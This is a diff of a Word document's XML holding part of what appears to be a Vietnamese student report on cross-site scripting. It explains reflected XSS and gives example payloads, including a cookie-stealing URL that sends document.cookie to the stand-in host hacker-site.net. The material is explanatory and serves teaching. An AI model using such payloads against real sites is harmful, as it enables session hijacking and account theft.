+        <w:t>Ngoài ra trong một số trường hợp đặc biệt, lỗ hổng XSS còn có thể xảy ra ở phía máy chủ web. Điều này thường gây ra hậu quả nghiêm trọng. Kẻ tấn công có thể đọc được các file nhạy cảm trên máy chủ.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"pJm2WyBW","properties":{"formattedCitation":"[18]","plainCitation":"[18]","noteIndex":0},"citationItems":[{"id":158,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/EMSZMYMX"],"itemData":{"id":158,"type":"webpage","abstract":"Trong thời đại công nghệ phát triển hiện nay, việc đảm bảo an ninh thông tin trên không gian mạng đang là vấn đề dành được nhiều sự quan tâm. Nguy cơ mất an toàn thông tin đang là mối đe dọa lớn và ng...","language":"en","title":"Tổng quan một số kỹ thuật khai thác lỗ hổng bảo mật Web (P1)","URL":"https://viblo.asia/p/tong-quan-mot-so-ky-thuat-khai-thac-lo-hong-bao-mat-web-p1-gGJ59MOP5X2","accessed":{"date-parts":[["2025",10,5]]},"issued":{"date-parts":[["2020",12,15]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[18]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="692DC505" wp14:editId="5F21F884">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5679629C" wp14:editId="09C8E6CC">
             <wp:extent cx="3848085" cy="2166075"/>
             <wp:effectExtent l="0" t="0" r="635" b="5715"/>
             <wp:docPr id="13" name="Picture 13" descr="XSS"/>
@@ -19123,7 +20396,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20">
+                    <a:blip r:embed="rId22">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -19157,71 +20430,240 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>XSS là một trong những mối đe dọa hàng đầu đối với an toàn ứng dụng web, cùng với SQL Injection và Authentication Hijacking. Nó thường được tận dụng thông qua các khung tiếp nhận dữ liệu của trang web, chẳng hạn như ô tìm kiếm, form bình luận, hoặc các trường nhập liệu khác mà dữ liệu không được kiểm tra và lọc cẩn thận trước khi hiển thị lại cho ngườ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">i dùng. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="17" w:name="_Toc208343451"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Các dạng tấn công và dặc điểm</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="17"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>XSS hoạt động dựa trên nguyên lý đơn giả</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n là</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ứng dụng web hiển thị lại mã độc do kẻ tấn công chèn vào, và trình duyệt của người dùng sẽ thực thi mã đó như thể nó là một phần hợp pháp của trang web. Có ba dạng tấn công XSS chính, được phân loại dựa trên cách mã độc được gửi đến máy chủ và cách nó đến được trình duyệt của nạ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n nhân</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Reflected XSS (XSS Phản Chiếu)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Đây là dạng tấn công phổ biến nhất. Mã độc được gửi đến nạn nhân thông qua một URL có chứa payload. Máy chủ chỉ phản hồi (phản chiếu) mã độc hại trở lại trình duyệt của nạn nhân, và mã này được thực thi ngay lập tứ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">c. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="720" w:firstLine="504"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>XSS là một trong những mối đe dọa hàng đầu đối với an toàn ứng dụng web, cùng với SQL Injection và Authentication Hijacking. Nó thường được tận dụng thông qua các khung tiếp nhận dữ liệu của trang web, chẳng hạn như ô tìm kiếm, form bình luận, hoặc các trường nhập liệu khác mà dữ liệu không được kiểm tra và lọc cẩn thận trước khi hiển thị lại cho ngườ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">i dùng. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:noProof/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="ja-JP"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F7C1DB1" wp14:editId="48AF74A7">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43D40250" wp14:editId="37698C08">
             <wp:extent cx="4429743" cy="2543530"/>
             <wp:effectExtent l="19050" t="19050" r="28575" b="28575"/>
             <wp:docPr id="21" name="Picture 21"/>
@@ -19236,7 +20678,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -19264,27 +20706,1227 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Cơ chế</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dựa trên m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ã độc không được lưu trữ trên máy chủ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mà nó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> đi từ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ạ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n nhân đến m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">áy chủ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>rồi trở lại</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ạ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>n nhân.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Kẻ tấn công tạo ra một URL độc hại (ví dụ: gửi qua email hoặc tin nhắn) chứa mã script và lừa nạn nhân nhấ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">p vào. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Ví dụ Payload: Giả sử trang tìm kiếm hiển thị giá trị tìm kiế</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">m trong URL: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>https://victimsite.com/search?q=&lt;script&gt;alert('XSS_Reflected!');&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Có nhiều hướng để khai thác thông qua lỗi Reflected XSS, một trong những cách được biết đến nhiều nhất là chiếm phiên làm việc (session) của người dùng, từ đó có thể truy cập được dữ liệu và chiếm được quyền của họ trên website. Chi tiết được mô tả qua những bước sau:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Người dùng đăng nhập web và giả sử đượ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>c gán session:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Set-Cookie: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bằng cách nào đó, hacker gửi được cho người dùng URL:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>http://</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>victimsite.com</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4C94D8" w:themeColor="text2" w:themeTint="80"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>/name=var+i=new+Image;+i.src=”http://hacker-site.net/”%2Bdocument.cookie;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
